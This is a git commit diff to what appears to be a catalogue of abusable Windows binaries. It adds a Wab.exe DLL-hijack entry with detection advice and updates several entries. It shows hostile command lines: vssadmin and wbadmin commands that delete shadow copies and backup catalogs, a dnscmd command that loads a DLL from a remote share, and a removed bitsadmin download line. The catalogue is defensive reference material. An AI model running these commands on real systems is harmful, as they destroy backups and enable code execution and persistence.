Cleaning and adding Wab.exe
parent
8b1e87b251
commit
118c337dfb
|
@ -3,7 +3,6 @@ Kd.exe Debugger
|
||||||
Certreq.exe Exfiltrate data
|
Certreq.exe Exfiltrate data
|
||||||
Dbghost.exe
|
Dbghost.exe
|
||||||
Robocopy.exe Needs examples
|
Robocopy.exe Needs examples
|
||||||
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
|
||||||
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
||||||
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
|
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
|
||||||
wbadmin.exe wbadmin delete catalog -quiet
|
wbadmin.exe wbadmin delete catalog -quiet
|
||||||
|
@ -15,3 +14,5 @@ WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a7
|
||||||
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
|
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
|
||||||
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
|
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
|
||||||
https://twitter.com/Hexacorn/status/993498264497541120
|
https://twitter.com/Hexacorn/status/993498264497541120
|
||||||
|
https://twitter.com/Hexacorn/status/994000792628719618
|
||||||
|
https://github.com/MoooKitty/Code-Execution
|
||||||
|
|
|
@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||||
[Print.exe](OSBinaries/Print.md)
|
[Print.exe](OSBinaries/Print.md)
|
||||||
[Psr.exe](OSBinaries/Psr.md)
|
[Psr.exe](OSBinaries/Psr.md)
|
||||||
[Qprocess.exe](OSBinaries/Qprocess.md)
|
|
||||||
[Reg.exe](OSBinaries/Reg.md)
|
[Reg.exe](OSBinaries/Reg.md)
|
||||||
[Regedit.exe](OSBinaries/Regedit.md)
|
[Regedit.exe](OSBinaries/Regedit.md)
|
||||||
[Regasm.exe](OSBinaries/Regasm.md)
|
[Regasm.exe](OSBinaries/Regasm.md)
|
||||||
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
|
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
|
||||||
[Regini.exe](OSBinaries/Regini.md)
|
|
||||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||||
[Replace.exe](OSBinaries/Replace.md)
|
[Replace.exe](OSBinaries/Replace.md)
|
||||||
|
@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Sc.exe](OSBinaries/Sc.md)
|
[Sc.exe](OSBinaries/Sc.md)
|
||||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
||||||
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
|
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
|
||||||
|
[Wab.exe](OSBinaries/Wab.md)
|
||||||
[Wmic.exe](OSBinaries/Wmic.md)
|
[Wmic.exe](OSBinaries/Wmic.md)
|
||||||
[Wscript.exe](OSBinaries/Wscript.md)
|
[Wscript.exe](OSBinaries/Wscript.md)
|
||||||
[Xwizard.exe](OSBinaries/Xwizard.md)
|
[Xwizard.exe](OSBinaries/Xwizard.md)
|
||||||
|
|
|
@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Dimitrios Slamaris - @dim0x69
|
* Shay Ber - ?
|
||||||
|
* Dimitrios Slamaris - @dim0x69
|
||||||
|
* Nikhil SamratAshok Mittal - @nikhil_mitt
|
||||||
|
|
||||||
Code sample:
|
Code sample:
|
||||||
*
|
*
|
||||||
|
|
||||||
Resources:
|
Resources:
|
||||||
|
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||||
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||||
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||||
* https://twitter.com/Hexacorn/status/994000792628719618
|
* https://twitter.com/Hexacorn/status/994000792628719618
|
||||||
|
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||||
|
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
|
|
|
@ -1,31 +0,0 @@
|
||||||
## Qprocess.exe
|
|
||||||
|
|
||||||
* Functions: Credentials
|
|
||||||
|
|
||||||
```
|
|
||||||
qprocess /SERVER:RemoteServer
|
|
||||||
```
|
|
||||||
|
|
||||||
Acknowledgements:
|
|
||||||
* Rahmat Nurfauzi - @infosecn1nja
|
|
||||||
|
|
||||||
Code sample:
|
|
||||||
*
|
|
||||||
|
|
||||||
Resources:
|
|
||||||
* https://twitter.com/infosecn1nja/status/987268926139592706
|
|
||||||
|
|
||||||
Full path:
|
|
||||||
```
|
|
||||||
c:\windows\system32\Qprocess.exe
|
|
||||||
```
|
|
||||||
|
|
||||||
Notes:
|
|
||||||
Some specific details about the binary file.
|
|
||||||
|
|
||||||
|
|
||||||
Detection:
|
|
||||||
Details about detection.
|
|
||||||
IOC, Behaviour , User Agents etc
|
|
||||||
|
|
||||||
|
|
|
@ -1,30 +0,0 @@
|
||||||
## Regini.exe
|
|
||||||
|
|
||||||
* Functions: Credentials
|
|
||||||
|
|
||||||
```
|
|
||||||
regini -m \\RemoteServer Example
|
|
||||||
```
|
|
||||||
|
|
||||||
Acknowledgements:
|
|
||||||
* Osanda Malith - @OsandaMalith
|
|
||||||
|
|
||||||
Code sample:
|
|
||||||
*
|
|
||||||
|
|
||||||
Resources:
|
|
||||||
* https://twitter.com/OsandaMalith/status/987823644402372608
|
|
||||||
* https://ss64.com/nt/regini.html
|
|
||||||
|
|
||||||
Full path:
|
|
||||||
```
|
|
||||||
c:\windows\system32\regini.exe
|
|
||||||
c:\windows\sysWOW64\regini.exe
|
|
||||||
```
|
|
||||||
|
|
||||||
Notes:
|
|
||||||
Can also be used to add registry keys
|
|
||||||
|
|
||||||
Detection:
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
## Wab.exe
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
Wab.exe (requires registry changes)
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Adam - @Hexacorn
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||||
|
* https://twitter.com/Hexacorn/status/991447379864932352
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Program Files\Windows Mail\wab.exe
|
||||||
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Searches for wab.dll. Can be manipulated with the following registry key:
|
||||||
|
```
|
||||||
|
HKLM\Software\Microsoft\WAB\DLLPath
|
||||||
|
```
|
||||||
|
|
||||||
|
Binary is used to manage Windows contacts/wab files. (Legacy)
|
||||||
|
|
||||||
|
|
||||||
|
Detection:
|
||||||
|
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -21,11 +21,13 @@ Resources:
|
||||||
|
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||||
|
|
||||||
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
Part of SQL server, but also Office in some versions.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue